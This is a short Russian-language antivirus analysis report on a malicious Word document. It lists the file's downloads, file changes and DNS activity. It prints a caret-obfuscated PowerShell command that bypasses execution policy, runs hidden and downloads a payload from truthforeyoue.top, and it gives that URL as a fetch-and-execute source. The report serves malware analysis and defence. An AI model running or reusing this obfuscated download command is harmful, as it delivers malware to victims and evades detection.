Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://truthforeyoue.top/search.php как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "PoWerSh^E^l^L.^E^Xe^ -eXe^Cut^IONpol^i^Cy^ bYp^a^s^S ^-^n^opR^of^iLe ^-^WINDo^wstYLE H^I^d^D^E^n (ne^W-oB^Ject SY^st^EM.nE^T.W^Ebc^l^ienT^)^.D^oWNLOa^D^fiL^E^('http://truthf...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\word\<Имя файла>.doc
Удаляет следующие файлы
- %TEMP%\word\<Имя файла>.doc
Сетевая активность
UDP
- DNS ASK tr####oreyoue.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "PoWerSh^E^l^L.^E^Xe^ -eXe^Cut^IONpol^i^Cy^ bYp^a^s^S ^-^n^opR^of^iLe ^-^WINDo^wstYLE H^I^d^D^E^n (ne^W-oB^Ject SY^st^EM.nE^T.W^Ebc^l^ienT^)^.D^oWNLOa^D^fiL^E^('http://truthf...' (со скрытым окном)
